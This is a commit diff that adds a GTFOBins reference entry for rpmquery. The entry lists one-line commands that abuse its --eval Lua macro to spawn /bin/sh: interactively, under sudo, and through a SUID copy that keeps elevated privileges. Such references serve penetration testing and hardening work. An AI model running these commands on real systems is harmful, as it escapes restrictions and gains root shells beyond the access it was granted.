First commit
This commit is contained in:
9
_gtfobins/rpmquery.md
Normal file
9
_gtfobins/rpmquery.md
Normal file
@@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
||||
Reference in New Issue
Block a user